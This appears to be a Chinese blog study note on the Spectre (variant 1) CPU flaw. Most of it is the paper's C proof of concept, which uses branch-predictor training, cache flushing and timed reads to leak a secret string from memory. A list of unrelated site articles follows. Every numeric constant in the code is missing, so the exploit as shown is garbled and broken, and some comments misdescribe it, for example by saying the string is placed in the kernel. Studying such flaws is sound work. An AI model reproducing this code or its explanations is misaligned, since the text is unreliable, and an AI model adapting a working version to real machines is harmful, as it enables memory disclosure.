关于Intel漏洞的学习
2024-10-16 13:50:50
这几天报道了Intel的漏洞,这里学习一下并做个记录。
报告:https://spectreattack.com/spectre.pdf
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>
#ifdef _MSC_VER //编译器根据版本自动调用lib库
#include <intrin.h> //用于内核编程
#pragma optimize("gt", on) //允许全局优化和指定更短的机器代码序列,on是打开功能
#else
#include <x86intrin.h>
#endif unsigned int array1_size = ;
uint8_t unused1[];
uint8_t array1[] = {,,,,,,,,,,,,,,,};
uint8_t unused2[];
uint8_t array2[ * ]; char * secret = "The Magic Words are QKSword"; //插入内核的字符串 uint8_t temp = ; /* Used so compiler won’t optimize out victim_function() */ void victim_function(size_t x)
{
if (x < array1_size)
{
temp &= array2[array1[x] * ];
}
} /********************************************************************
Analysis code
********************************************************************/
#define CACHE_HIT_THRESHOLD (80) /* assume cache hit if time <= threshold */ /* Report best guess in value[0] and runner-up in value[1] */
void readMemoryByte(size_t malicious_x, uint8_t value[], int score[])
{
static int results[];
int tries, i, j, k, mix_i;
unsigned int junk = ;
size_t training_x, x;
register uint64_t time1, time2;
volatile uint8_t * addr; for (i = ; i < ; i++)
results[i] = ;
for (tries = ; tries > ; tries--)
{
/* Flush array2[256*(0..255)] from cache */
for (i = ; i < ; i++)
_mm_clflush(&array2[i * ]); /* intrinsic for clflush instruction */ /* 30 loops: 5 training runs (x=training_x) per attack run (x=malicious_x) */
training_x = tries % array1_size;
for (j = ; j >= ; j--) {
_mm_clflush(&array1_size);
for (volatile int z = ; z < ; z++) {} /* Delay (can also mfence) */ /* Bit twiddling to set x=training_x if j%6!=0 or malicious_x if j%6==0 */
/* Avoid jumps in case those tip off the branch predictor */
x = ((j % ) - ) & ~0xFFFF; /* Set x=FFF.FF0000 if j%6==0, else x=0 */
x = (x | (x >> )); /* Set x=-1 if j&6=0, else x=0 */
x = training_x ^ (x & (malicious_x ^ training_x)); /* Call the victim! */
victim_function(x);
} /* Time reads. Order is lightly mixed up to prevent stride prediction */
for (i = ; i < ; i++)
{
mix_i = ((i * ) + ) & ;
addr = &array2[mix_i * ];
time1 = __rdtscp(&junk); /* READ TIMER */
junk = *addr; /* MEMORY ACCESS TO TIME */
time2 = __rdtscp(&junk) - time1; /* READ TIMER & COMPUTE ELAPSED TIME */
if (time2 <= CACHE_HIT_THRESHOLD && mix_i != array1[tries % array1_size])
results[mix_i]++; /* cache hit - add +1 to score for this value */
} /* Locate highest & second-highest results results tallies in j/k */
j = k = -;
for (i = ; i < ; i++)
{
if (j < || results[i] >= results[j])
{
k = j;
j = i;
}
else if (k < || results[i] >= results[k])
{
k = i;
}
}
if (results[j] >= ( * results[k] + ) || (results[j] == && results[k] == ))
break; /* Clear success if best is > 2*runner-up + 5 or 2/0) */
}
results[] ^= junk; /* use junk so code above won’t get optimized out*/
value[] = (uint8_t)j;
score[] = results[j];
value[] = (uint8_t)k;
score[] = results[k];
} int main(int argc, const char * * argv)
{
printf("Putting '%s' in memory\n", secret);
size_t malicious_x = (size_t)(secret - (char *)array1); /* default for malicious_x */
int i, score[], len = strlen(secret);
uint8_t value[]; for (i = ; i < sizeof(array2); i++)
array2[i] = ; /* write to array2 so in RAM not copy-on-write zero pages */
if (argc == )
{
sscanf_s(argv[], "%p", (void * *)(&malicious_x));
malicious_x -= (size_t)array1; /* Convert input value into a pointer */
sscanf_s(argv[], "%d", &len);
} printf("Reading %d bytes:\n", len);
while (--len >= )
{
printf("Reading at malicious_x = %p... ", (void *)malicious_x);
readMemoryByte(malicious_x++, value, score); //读取写入的字符串
printf("%s: ", (score[] >= * score[] ? "Success" : "Unclear"));
printf("0x%02X=’%c’ score=%d ", value[],
(value[] > && value[] < ? value[] : '?'), score[]);
if (score[] > )
printf("(second best: 0x%02X score=%d)", value[], score[]);
printf("\n");
}
system("pause");
return ();
}
这个程序的主要功能就是把一段字符串写入内核中,然后通过漏洞读取出来,用来检测电脑是否存在漏洞。
代码还没全部注释完,这里先放一下,以免忘记
最新文章
- 如何在脚本中获取进程ID(PID)
- Linux命令行小插曲
- CDOJ 1104 求两个数列的子列的交集 查询区间小于A的数有多少个 主席树
- compile ffmpeg
- 浅析五大ASP.NET数据控件
- xampp进程和非进程执行
- Centos网口流量实时监控
- Socket网络编程详解
- vue cli使用融云实现聊天
- [转]如何在Angular4中引入jquery
- CodeIgniter 2.x和3.x修改默认控制器问题解答
- [UFLDL] *Sparse Representation
- ccf碰撞的小球
- Java IO流学习总结六:ByteArrayInputStream、ByteArrayOutputStream
- Imageview 按比例适应屏幕大小
- ios UnitTest 学习笔记
- cv.Mat 与 .txt 文件数据的读写操作
- mysql 修改编码格式
- 后缀数组suffix array
- 拉普拉斯分布(Laplace distribution)
热门文章
- Wordpress添加分类
- Visual Studio 2017 扩展
- cookie 跨域解决方法
- 【PMP】项目整合管理
- Delphi提取PDF文本
- window下zookeeper的下载启动和报错等问题
- C#7.2——编写安全高效的C#代码 c# 中模拟一个模式匹配及匹配值抽取 走进 LINQ 的世界 移除Excel工作表密码保护小工具含C#源代码 腾讯QQ会员中心g_tk32算法【C#版】
- Java并发编程:4种线程池和缓冲队列BlockingQueue
- Django Http请求生命周期
- Atitit s2018 s3 doc list alldvc.docx .docx s2018 s3f doc compc s2018 s3f doc homepc sum doc dvcCompc dtS312 s2018 s3f doc compc\Atitit PathUtil 工具新特性新版本 v8 s312.docx s2018 s3f doc compc\Atitit 操作日